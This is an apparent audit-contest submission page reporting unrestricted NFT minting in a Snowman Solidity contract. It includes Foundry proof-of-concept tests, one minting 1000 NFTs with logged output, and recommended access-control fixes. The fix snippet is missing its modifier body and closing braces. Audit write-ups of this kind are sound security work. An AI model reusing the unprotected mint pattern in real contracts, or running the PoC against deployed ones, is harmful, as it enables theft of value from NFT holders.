Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Unrestricted Snowman::mintSnowman Allows Anyone to Mint Unlimited Snowman NFTs

miked

Root + Impact

Description

Snowman.mintSnowman() is external and has no access control. Although Snowman inherits Ownable, the mint function is not restricted to the owner, a minter role, or the SnowmanAirdrop contract.
Any address can mint any number of Snowman NFTs to itself or another receiver without owning Snow, staking Snow, providing a Merkle proof, or presenting a valid signature. This breaks the core distribution mechanism and inflates the NFT supply.

// src/Snowman.sol

@> function mintSnowman(address receiver, uint256 amount) external {

for (uint256 i = 0; i < amount; i++) {

@> _safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

Risk

Likelihood:

Any external account or contract can call Snowman::mintSnowman directly because the function lacks access control and does not require the caller to be the owner, the airdrop contract, or an approved minter.
The exploit requires no special setup, Merkle proof, signature, Snow balance, staking, or payment. An attacker only needs to call mintSnowman(receiver, amount) with their chosen receiver and quantity.

Impact:

An attacker can mint unlimited Snowman NFTs without satisfying the protocol’s intended eligibility, staking, Merkle proof, or signature requirements.
This bypasses the core NFT distribution mechanism, inflates the NFT supply, and can devalue or invalidate legitimately earned or claimed Snowman NFTs.

Proof of Concept

## Proof of Concept

### Overview

`Snowman::mintSnowman()` is externally callable and completely lacks access control. Any arbitrary address can call it directly to mint Snowman NFTs without owning Snow tokens, staking, providing Merkle proofs, or submitting valid signatures.

### Exploit Scenario

* **Initial State:** The contract has a global token counter at 0. An arbitrary attacker address has an NFT balance of 0 and does not possess any authorized eligibility criteria (no Snow tokens, no valid signature, no Merkle proof).

* **Step 1:** The unauthorized attacker directly calls the public `Snowman::mintSnowman(attacker, amount)` function, requesting an arbitrary amount of 3 NFTs.

* **Step 2:** The protocol processes the execution without performing any modifier checks, balance validations, or cryptographic signature verifications.

* **Outcome:** The attacker successfully bypasses the entire intended NFT distribution mechanism, receives all 3 Snowman NFTs, and inflates the global token counter to 3. Legitimate holders have their NFT value diluted.

### Working Test Case

Place this test in `test/TestSnowman.t.sol`, inside `contract TestSnowman`.

Run with:

```bash

forge test --match-test testAnyoneCanMintSnowmanWithoutEligibility -vvvv

```

```solidity

function testAnyoneCanMintSnowmanWithoutEligibility() public {

// Create an arbitrary attacker address.

address attacker = makeAddr("attacker");

// The attacker chooses how many Snowman NFTs to mint.

uint256 amount = 3;

// The attacker starts with no Snowman NFTs.

assertEq(nft.balanceOf(attacker), 0);

// The token counter starts at zero in this test setup.

assertEq(nft.getTokenCounter(), 0);

// The attacker calls mintSnowman() directly.

// No Snow balance, staking, Merkle proof, or signature is provided.

vm.prank(attacker);

nft.mintSnowman(attacker, amount);

// The attacker receives all three Snowman NFTs.

assertEq(nft.balanceOf(attacker), amount);

// The newly minted token IDs are owned by the attacker.

assertEq(nft.ownerOf(0), attacker);

assertEq(nft.ownerOf(1), attacker);

assertEq(nft.ownerOf(2), attacker);

// The global token counter increased by the minted amount.

assertEq(nft.getTokenCounter(), amount);

}

```

Recommended Mitigation

### Mitigation

To fix this vulnerability, restrict the `Snowman::mintSnowman()` function so that only the authorized minting contract or role can invoke it.

#### Recommended Architectural Fix

If the `SnowmanAirdrop` contract is intended to be the sole distributor, store its deployment address as an `immutable` state variable during initialization and enforce this restriction via a custom modifier:

```solidity

// Add state variable and modifier to Snowman.sol

address public immutable i_minter;

error Snowman__NotMinter();

modifier onlyMinter() {

if (msg.sender != i_minter) {

revert Snowman__NotMinter();

}

constructor(address minter) ERC721("Snowman", "SNOWMAN") {

i_minter = minter;

}

// Apply the modifier to the minting function

function mintSnowman(address receiver, uint256 amount) external onlyMinter {

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

```

#### Alternative Design Patterns

* **Access Control Roles:** If the protocol requires multiple authorized minters or future flexibility, implement OpenZeppelin's `AccessControl` and grant a `MINTER_ROLE` to the legitimate distribution contracts.

* **Owner Warning:** Avoid blindly appending an `onlyOwner` modifier unless the deployment scripts explicitly transfer ownership to the correct minting authority contract, or if the contract owner is intentionally designated to handle manual distribution.

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 4 hours ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!